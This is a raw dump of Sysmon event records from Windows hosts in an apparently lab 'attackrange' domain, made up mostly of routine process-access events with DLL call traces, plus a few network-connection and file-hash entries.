10341000x80000000000000001048279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.725{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.678{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\S
ystem32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.678{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.678{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.678{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.678{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.678{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 354300x80000000000000001048269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:23.755{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57255-false10.0.1.14win-dc-890.attackrange.local49676- 354300x80000000000000001048268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:23.623{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51013-false10.0.1.12-8000- 
10341000x80000000000000001048267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.259{466BC892-02AF-60E8-1300-00000000CF01}9761444C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.241{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.225{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.225{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.225{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.209{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.209{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.194{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1DA110F5EF4435ACB30F03100CE6891,SHA256=40A33E4C6DA5D2D24BCCCA802E1B79FED099D273413FACD16A7D5647F659478F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807467Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:30.035{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net16232-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000807466Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:31.221{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59A4FCFEBCA7A08C6DD55232720E2C69,SHA256=25388D13DEC029D1F102E1B9EC435BC2EDF0A383F91B3D6FEC7B745060A8FE3A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.178{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.163{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.163{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36dd2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
